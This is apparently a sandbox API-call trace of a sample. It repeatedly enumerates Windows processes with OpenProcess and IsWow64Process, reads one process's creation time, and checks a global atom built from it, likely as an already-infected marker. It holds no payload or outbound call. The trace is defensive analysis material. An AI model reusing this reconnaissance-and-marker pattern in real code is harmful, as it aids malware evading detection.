	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.909] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.909] CloseHandle (hObject=0x224) returned 1
	[0077.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.909] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.909] CloseHandle (hObject=0x224) returned 1
	[0077.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.909] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.909] CloseHandle (hObject=0x224) returned 1
	[0077.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.910] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.910] CloseHandle (hObject=0x224) returned 1
	[0077.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.910] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.910] CloseHandle (hObject=0x224) returned 1
	[0077.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.910] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.910] CloseHandle (hObject=0x224) returned 1
	[0077.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.910] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.910] CloseHandle (hObject=0x224) returned 1
	[0077.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.910] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.910] CloseHandle (hObject=0x224) returned 1
	[0077.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.910] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.910] CloseHandle (hObject=0x224) returned 1
	[0077.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.911] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.911] CloseHandle (hObject=0x224) returned 1
	[0077.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.911] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.911] CloseHandle (hObject=0x224) returned 1
	[0077.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.911] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.911] CloseHandle (hObject=0x224) returned 1
	[0077.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.911] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.911] CloseHandle (hObject=0x224) returned 1
	[0077.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.911] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.911] CloseHandle (hObject=0x224) returned 1
	[0077.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.911] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.911] CloseHandle (hObject=0x224) returned 1
	[0077.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.911] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.911] CloseHandle (hObject=0x224) returned 1
	[0077.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.912] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.912] CloseHandle (hObject=0x224) returned 1
	[0077.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.912] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.912] CloseHandle (hObject=0x224) returned 1
	[0077.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.912] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.912] CloseHandle (hObject=0x224) returned 1
	[0077.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.912] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.912] CloseHandle (hObject=0x224) returned 1
	[0077.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.912] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.912] CloseHandle (hObject=0x224) returned 1
	[0077.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.912] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.912] CloseHandle (hObject=0x224) returned 1
	[0077.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.913] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.913] CloseHandle (hObject=0x224) returned 1
	[0077.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.913] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.913] CloseHandle (hObject=0x224) returned 1
	[0077.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.913] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.913] CloseHandle (hObject=0x224) returned 1
	[0077.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.913] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.913] CloseHandle (hObject=0x224) returned 1
	[0077.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.913] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.913] CloseHandle (hObject=0x224) returned 1
	[0077.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.913] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.913] CloseHandle (hObject=0x224) returned 1
	[0077.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.913] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.914] CloseHandle (hObject=0x224) returned 1
	[0077.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.914] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.914] CloseHandle (hObject=0x224) returned 1
	[0077.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.914] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.914] CloseHandle (hObject=0x224) returned 1
	[0077.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.914] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.914] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.914] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.914] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.915] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.915] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.915] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.915] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.915] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.915] CloseHandle (hObject=0x224) returned 1
	[0077.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.915] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.915] CloseHandle (hObject=0x224) returned 1
	[0077.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.915] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.916] CloseHandle (hObject=0x224) returned 1
	[0077.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.991] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.991] CloseHandle (hObject=0x224) returned 1
	[0077.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.991] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.991] CloseHandle (hObject=0x224) returned 1
	[0077.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.992] CloseHandle (hObject=0x224) returned 1
	[0077.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.992] CloseHandle (hObject=0x224) returned 1
	[0077.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.992] CloseHandle (hObject=0x224) returned 1
	[0077.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.992] CloseHandle (hObject=0x224) returned 1
	[0077.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.992] CloseHandle (hObject=0x224) returned 1
	[0077.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.992] CloseHandle (hObject=0x224) returned 1
	[0077.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.993] CloseHandle (hObject=0x224) returned 1
	[0077.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.993] CloseHandle (hObject=0x224) returned 1
	[0077.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.993] CloseHandle (hObject=0x224) returned 1
	[0077.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.993] CloseHandle (hObject=0x224) returned 1
	[0077.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.993] CloseHandle (hObject=0x224) returned 1
	[0077.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.993] CloseHandle (hObject=0x224) returned 1
	[0077.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.994] CloseHandle (hObject=0x224) returned 1
	[0077.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.994] CloseHandle (hObject=0x224) returned 1
	[0077.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.994] CloseHandle (hObject=0x224) returned 1
	[0077.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.994] CloseHandle (hObject=0x224) returned 1
	[0077.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.994] CloseHandle (hObject=0x224) returned 1
	[0077.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.994] CloseHandle (hObject=0x224) returned 1
	[0077.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.995] CloseHandle (hObject=0x224) returned 1
	[0077.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.995] CloseHandle (hObject=0x224) returned 1
	[0077.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.995] CloseHandle (hObject=0x224) returned 1
	[0077.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.995] CloseHandle (hObject=0x224) returned 1
	[0077.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.995] CloseHandle (hObject=0x224) returned 1
	[0077.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.995] CloseHandle (hObject=0x224) returned 1
	[0077.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.995] CloseHandle (hObject=0x224) returned 1
	[0077.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.996] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.996] CloseHandle (hObject=0x224) returned 1
	[0077.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.996] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.996] CloseHandle (hObject=0x224) returned 1
	[0077.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.996] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.996] CloseHandle (hObject=0x224) returned 1
	[0077.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.996] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.996] CloseHandle (hObject=0x224) returned 1
	[0077.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.996] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.996] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.997] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.997] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.997] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.997] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.997] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.997] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.997] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.997] CloseHandle (hObject=0x224) returned 1
	[0077.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.997] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.997] CloseHandle (hObject=0x224) returned 1
	[0077.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.998] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.998] CloseHandle (hObject=0x224) returned 1
	[0078.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0078.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0078.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0078.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0078.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0078.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0078.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0078.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0078.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0078.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0078.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0078.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0078.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0078.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0078.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0078.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0078.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0078.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0078.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0078.171] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.171] CloseHandle (hObject=0x224) returned 1
	[0078.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0078.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0078.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0078.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.172] CloseHandle (hObject=0x224) returned 1
	[0078.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0078.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0078.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.172] CloseHandle (hObject=0x224) returned 1
	[0078.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0078.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.172] CloseHandle (hObject=0x224) returned 1
	[0078.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0078.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.172] CloseHandle (hObject=0x224) returned 1
	[0078.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
